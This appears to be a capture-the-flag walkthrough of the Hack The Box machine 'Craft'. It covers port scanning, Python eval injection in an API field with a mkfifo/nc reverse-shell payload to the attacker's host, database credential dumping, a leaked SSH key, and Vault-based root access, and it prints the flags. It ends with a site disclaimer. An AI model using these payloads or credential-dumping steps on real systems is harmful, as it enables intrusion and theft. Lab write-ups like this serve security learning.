Information Gathering

$ ip='10.10.10.110'; itf='tun0'; if nmap -Pn -sn "$ip" | grep -q "Host is up"; then echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"; ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//'); if [ -n "$ports" ]; then echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"; nmap -Pn -sV -sC -p "$ports" "$ip"; else echo -e "\e[31m[!] No open ports found on $ip.\e[0m"; fi; else echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"; fi

PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 bde76c22817adb3ec0f0731df3af7765 (RSA)
|   256 82b5f9d1953b6d800f3591862db3d766 (ECDSA)
|_  256 283b2618ecdfb336859c27548d8ce133 (ED25519)
443/tcp  open  ssl/http nginx 1.15.8
|_http-title: About
|_http-server-header: nginx/1.15.8
| ssl-cert: Subject: commonName=craft.htb/organizationName=Craft/stateOrProvinceName=NY/countryName=US
| Not valid before: 2019-02-06T02:25:47
|_Not valid after:  2020-06-20T02:25:47
| tls-nextprotoneg: 
|_  http/1.1
| tls-alpn: 
|_  http/1.1
|_ssl-date: TLS randomness does not represent time
6022/tcp open  ssh      (protocol 2.0)
| ssh-hostkey: 
|_  2048 5bccbff1a18f72b0c0fbdfa301dca6fb (RSA)
| fingerprint-strings: 
|   NULL: 
|_    SSH-2.0-Go
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port6022-TCP:V=7.93%I=7%D=3/9%Time=67CD326B%P=x86_64-pc-linux-gnu%r(NUL
SF:L,C,"SSH-2\.0-Go\r\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

gogs leak && Craft API && Python eval

# echo '10.10.10.110 craft.htb'>>/etc/hosts

https://craft.htb/

# echo '10.10.10.110 api.craft.htb gogs.craft.htb'>>/etc/hosts

https://api.craft.htb/api

https://gogs.craft.htb/

https://gogs.craft.htb/Craft/craft-api/commit/a2d28ed1554adddfcfb845879bfea09f976ab7c1

username:dinesh
password:4aUh0A8PbVJxgd
URL:https://api.craft.htb/api/auth/login

https://gogs.craft.htb/Craft/craft-api/commit/c414b160578943acfe2e158e89409623f41da4c6

eval('%s > 1' % request.json['abv'])

1.获取TOKEN

token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoiZGluZXNoIiwiZXhwIjoxNzQxNTAxNzY2fQ.b4Wde8XjJQs1UZ9phQCeDWBdtJqsWi0jMxA3hi6GZOY

https://gogs.craft.htb/Craft/craft-api/src/master/tests/test.py

POST /api/brew/ HTTP/1.1
Host: api.craft.htb
Content-Length: 122
Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8"
Accept: application/json
Content-Type: application/json
X-Craft-API-Token:eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoiZGluZXNoIiwiZXhwIjoxNzQxNTAyNjQ0fQ.U3Pbe3MOCpeM_nWurXn5AfQJO6KsPuakF4ZIaM2Wiq8
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.65 Safari/537.36
Sec-Ch-Ua-Platform: "Linux"
Origin: https://api.craft.htb
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://api.craft.htb/api/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

{
  "id": 0,
  "brewer": "x",
  "name": "x",
  "style": "x",
  "abv": "__import__('os').system('ping -c 1 10.10.16.33')"
}

Python eval执行机制:仅允许动态导入模块执行,无法使用静态导入模块执行(无法执行多语句)

{
  "id": 0,
  "brewer": "x",
  "name": "x",
  "style": "x",
  "abv": "__import__('os').system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.33 443 >/tmp/f')"
}

Lateral Movement:gilfoyle

/opt/app # tar -czvf /opt/app.tar.gz -C /opt app

CRAFT_API_SECRET = 'hz66OCkDtv8G6D'
MYSQL_DATABASE_USER = 'craft'
MYSQL_DATABASE_PASSWORD = 'qLGockJ6G2J75O'
MYSQL_DATABASE_DB = 'craft'

#!/usr/bin/env python

import pymysql

connection = pymysql.connect(
    host='db',
    user='craft',
    password='qLGockJ6G2J75O',
    db='craft',
    cursorclass=pymysql.cursors.DictCursor
)

def show_tables(cursor):
    sql = "SHOW TABLES"
    cursor.execute(sql)
    tables = cursor.fetchall()
    print("\nTables in the database:")
    for idx, table in enumerate(tables, start=1):
        print(f"{idx}. {table['Tables_in_craft']}")
    print("\n")
    return tables

def show_table_data(cursor, table_name):
    sql = f"SELECT * FROM `{table_name}`"
    cursor.execute(sql)
    rows = cursor.fetchall()
    if rows:
        print(f"\nData in table {table_name}:")
        columns = rows[0].keys()
        print(f"{' | '.join(columns)}")
        print("-" * (len(' | '.join(columns))))
        for row in rows:
            print(' | '.join(str(row[column]) for column in columns))
    else:
        print(f"\nTable {table_name} is empty.")
    print("\n")

def main():
    try:
        with connection.cursor() as cursor:
            while True:
                tables = show_tables(cursor)
                user_input = input("Enter the number corresponding to the table to view data, or 'exit' to quit: ").strip()
                
                if user_input.lower() == 'exit':
                    print("Exiting program.")
                    break


                if user_input.isdigit():
                    table_idx = int(user_input) - 1
                    if 0 <= table_idx < len(tables):
                        table_name = tables[table_idx]['Tables_in_craft']
                        show_table_data(cursor, table_name)
                    else:
                        print("Invalid table number. Please try again.")
                else:
                    print("Invalid input. Please enter a valid table number or 'exit'.")
    finally:
        connection.close()

if __name__ == "__main__":
    main()

$ python3 exp.py

1 | dinesh | 4aUh0A8PbVJxgd
4 | ebachman | llJ77D8QFkLPQB
5 | gilfoyle | ZEU3N8WNM2rh4T

登录gilfoyle

https://gogs.craft.htb/user/login

https://gogs.craft.htb/gilfoyle/craft-infra/src/master/.ssh/id_rsa

Password:ZEU3N8WNM2rh4T

User.txt

8acca2cd2d6aa23703904828ba442997

Privilege Escalation:.vault-token && One-time SSH passwords

Vault 是一个用于管理敏感数据（如 API 密钥、密码和证书）的工具。

gilfoyle@craft:~$ cat .vault-token;vault login

token:f1783c8d-41c7-0b12-d1c1-cf2aa17ac6b9

gilfoyle@craft:~$ vault write ssh/creds/root_otp ip=127.0.0.1

key:67ebe3d4-cd6b-6e5c-6803-c635715eee91

gilfoyle@craft:~$ ssh root@127.0.0.1

Root.txt

8369706eff98143d8d461826b6282b01

4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途，否则一切后果请用户自负。

本站信息来自网络，版权争议与本站无关。您必须在下载后的24个小时之内，从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序，请支持正版，购买注册，得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解！

程序来源网络，不确保不包含木马病毒等危险内容，请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱：4ablog168#gmail.com（#换成@）